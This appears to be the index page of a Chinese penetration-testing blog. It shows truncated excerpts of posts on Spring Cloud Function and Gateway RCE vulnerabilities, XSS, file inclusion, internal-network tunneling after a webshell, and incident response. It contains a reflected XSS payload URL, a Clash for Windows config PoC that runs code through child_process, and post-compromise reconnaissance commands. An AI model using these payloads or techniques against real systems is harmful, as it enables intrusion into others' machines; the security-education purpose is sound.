CKCsec's Blog

前言为什么突然跳到这个框架安全得话题，就现在的安全意识水平，一般都会升级，或者是通报后及时整改修复，框架直接RCE的可能性小之又小，却没成想我手上真的出现了这样的资产。 本篇文章主要分享总结一下常见框架的rce姿势，或者是一些一键脚本，前人栽树后人乘凉嘛，脚本小子也还挺快乐的不是吗？ 本篇文章会同步及时更新，好比一个仓库，以便师傅们及时查阅。 不废话，直接开水（手动狗头）。 思维导图先来波思维导图（图是小迪的，借来用用哈） 基础知识中间件及框架列表： IIS，Apache，Nginx，Tomcat，Docker，K8s，Weblogic，JBoos，WebSphere，Jenkins ，GlassFish，Jetty，Jira，Struts2，Laravel，Solr，Shiro，Thinkphp，Spring，Flask，jQuery等 1、开发框架-PHP-Laravel-Thinkphp 2、开发框架-Javaweb-St2-Spring 3、开发框架-Python-django-Flask 4、开发框架-Javascript-Node.js-JQuery 5、其他框架-Jav ...

Spring Cloud Function SPEL 远程命令执行漏洞遵纪守法任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得危害网络安全，不得利用网络从事危害国家安全、荣誉和利益 漏洞描述Spring Cloud Function 是基于Spring Boot 的函数计算框架，通过对传输细节和基础架构进行抽象，为开发人员保留熟悉的开发工具和开发流程，使开发人员专注在实现业务逻辑上，从而提升开发效率。 访问Spring Cloud Function的 HTTP请求头中存在 spring.cloud.function.routing-expression参数，其 SpEL表达式可进行注入攻击，并通过 StandardEvaluationContext解析执行。最终，攻击者可通过该漏洞进行远程命令执行。 风险等级高 影响版本3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2 注：部分版本进行特定配置的动态路才会受该漏洞影响！ 资产确定app="vmware-SpringBoot-framewor ...

通用漏洞之XSS跨站碎碎念今天行程码终于没星星啦，是个值得庆祝的日子，水一篇文章助助兴（手动狗头） XSS跨站原理 指攻击者利用网站程序对用户输入过滤不足，输入可以显示在页面上对其他用户造成影响的HTML代码，从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。通过在用户端注入恶意的可执行脚本，若服务器对用户的输入不进行处理或处理不严，则浏览器就会直接执行用户注入的脚本。 主要存在的点数据交互的地方 get、post、headers 反馈与浏览 富文本编辑器 各类标签插入和自定义 数据输出的地方 用户资料 关键词、标签、说明 文件上传 XSS跨站分类XSS-Reflected反射型（非持久型）最常见的是Payload是构造在网址的某个GET参数的值里。 比如这样的： http://www.xx.com/company/search.html?key_pro="><script>confirm(ckcsec)</script> 与存储型相反，反射型XSS的是通过提交内容，然后不经过数据库，直接反射回显在页面 ...

通用漏洞之文件包含漏洞碎碎念安全，从去年的2月开始真正去了解安全，到4月的HW，然后参加各种大小型CTF，再参加网安基地的培训，最后在去年的11月收到了自己的第一份offer（渗透测试工程师），接各种项目，算一算已经入行一年有余了，入行的前两月激情满怀，热情四溢，从早学到晚，真的不知疲倦，但后面越来越浮躁，一直无法沉下心来，总感觉技术没有很大的提升，疫情原因出差，导致我的行程码带星星了（呜呜呜），进不去公司和客户现场，无业游民一个星期（等星星消失），正好静下心梳理这一年多来的学习经历，以及填一些没有时间填的坑。 文件包含漏洞先来波思维导图（图是小迪的，借来用用哈，我懒得搞了） 文件包含函数（代码审计）这里以php为例，在php中常用的文件包含函数有（include、require、include_once、require_once） Include：被包含文件先按参数给出的路径寻找，如果没有给出目录（只有文件名）时则按照 include_path指定的目录寻找。如果在 include_path下没找到该文件则 include 最后才在调用脚本文件所在的目录和当前工作目录下寻找。如果 ...

遵纪守法任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得危害网络安全，不得利用网络从事危害国家安全、荣誉和利益 漏洞描述 Spring Cloud GateWay是Spring Cloud的⼀个全新项⽬，⽬标是取代NetflixZuul，它基于Spring5.0+SpringBoot2.0+WebFlux（基于⾼性能的Reactor模式响应式通信框架Netty，异步⾮阻塞模型）等技术开发，性能⾼于Zuul，官⽅测试，GateWay是Zuul的1.6倍，旨在为微服务架构提供⼀种简单有效的统⼀的API路由管理⽅式。 Spring Cloud Gateway 远程代码执行漏洞（CVE-2022-22947）发生在Spring CloudGateway应用程序的Actuator端点，其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可通过该漏洞恶意创建允许在远程主机上执行任意远程执行的请求。 CVE 编号CVE-2022-22947 风险等级高危 影响版本Spring Cloud Gateway 3.1.x < 3.1.1Spring Cloud Ga ...

遵纪守法任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得危害网络安全，不得利用网络从事危害国家安全、荣誉和利益 漏洞描述crash_for_windows_pkg由 Electron 提供支持。如果 XSS 负载以代理的名义，我们可以远程执行受害者计算机上的任何 JavaScript 代码。 影响版本0.19.8（0.19.9版本还有（mac目前没发现） POCport: 7890socks-port: 7891allow-lan: truemode: Rulelog-level: infoexternal-controller: :9090proxies: - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);> type: socks5 server: 127.0.0.1 port: "17938" skip-cert-verify: ...

红队攻防之构建通道漫游内网前言当我们通过外网边界的一个入口点拿到Webshell后，想要在内网横 向拓展战果第一件事情就是要构建内网通道。 网络连通性测试ICMP #Windowsping 114.114.114.114 -n 1 #Linuxping 114.114.114.114 -c 1 HTTP curl http://www.baidu.com DNS nslookup baidu.com 仅DNS出网可直接CS-DNS上线（这个后面的教程最近在写，后面抽时间会发出来） 读取本机代理 查看代理配置情况,连接它的代理试试 REG QUERY "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" 是否存在Nginx反向代理 找到Nginx目录 查看配置文件 例如某次实战中发现正反向都代理不出去，查看配置文件发现了nginx反代，直接连接公网IP代理的3389端口 反向代理服务器能出网的情况下，反向代理可以穿透防火墙（需要上传文件） Coba ...

应急响应流程收到客户的主机中毒事件的问题通报，然后向客户获取中毒主机的ssh远程连接权限，或者到客户现场进行现场排查，（这种情况较少）。 注意事项1. 了解安全事件情况• 现在遇到了什么问题？• 什么时间发现的？如何发现的？谁发现的？• 服务器是否有异常？具体特征是什么？安全设备是否有告警？• 什么系统？用了什么中间件？什么开发语言？业务架构是什么？网络拓扑大概是什么样子？设备有没有重启或者关机过？是否有日志服务器？• 需要我解决什么？2. 事件初步判定• 根据客户所描述的信息，对事件形成初步判断，建立排查方向与应急思路• 判断自己能否处理，不能处理是否有其他同事可以处理3. 不要执行更改文件属性命令和操作；• 特定环境下文件的属性是可以改变的，甚至攻击者可以不改变文件属性前提修改文件内容• 保持样本最原始的属性和权限以及用户，方便溯源• 利用cp之后很可能在恢复阶段时候业务会宕掉(注意权限问题)4. linux不要执行rm -rf 的命令；• 可以加-f，但是-rf 组合一定慎用• 最好还是mv，移除样本5. 取样本的时候建议使用mv命令移到文件夹；• mkdir $HOME/sam ...